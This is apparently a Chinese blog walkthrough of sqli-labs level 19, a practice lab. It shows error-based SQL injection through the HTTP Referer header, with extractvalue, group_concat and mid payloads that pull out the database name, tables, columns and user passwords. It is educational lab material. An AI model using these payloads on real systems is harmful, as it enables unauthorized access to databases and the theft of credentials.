sqli-labs第十九关详解

博客内容涉及SQL注入攻击的原理与利用,通过HTTP Referer进行注入,展示了如何利用extractvalue和group_concat函数获取数据库名、表名、字段及数据。由于报错回显限制,采用mid函数进行字符串截断,逐步揭示完整信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

先看一下源码,发现跟上一关的差别不太大,只有两处地方不太一样,

第一处的$uagent的值

该值是http请求头Referer的值,所以注入点就为http的Referer了

第二处是第二个SQL语句,一样用的是报错注入

所以在利用$uagent进行注入的时候,payload应该这样闭合

1',sql语句)# 

所以先用burpsuite抓包,构造payload,查看一下数据库名

1',extractvalue(1,concat(0x5e,database())))#

 

接着爆表,构造payload

1',extractvalue(1,concat(0x5e,(select group_concat(table_name) from information_schema.tables where table_schema = database()))))#

 接着爆字段,构造payload

1',extractvalue(1,concat(0x5e,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users'))))#

接着查看值,构造payload

1',extractvalue(1,concat(0x5e,(select group_concat(password) from users))))#

由于报错回显最多32位字符串,所以导致了回显不全的问题,我们可以利用字符串截断函数进行截断回显,这里我们使用mid函数,截断查询语句,从第32位开始查看回显31位字符串,也就是mid(SQL语句,32,31)

为了查看剩下的密码,接着我们构造payload

1',extractvalue(1,concat(0x5e,mid((select group_concat(password) from users),32,31))))#

继续查看后续的密码,构造payload

1',extractvalue(1,concat(0x5e,mid((select group_concat(password) from users),64,31))))#

可以观察到,回显完了,继续截断也不会回显了,将上面的字符串连接起来就能得到完整的密码了

评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金 帛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值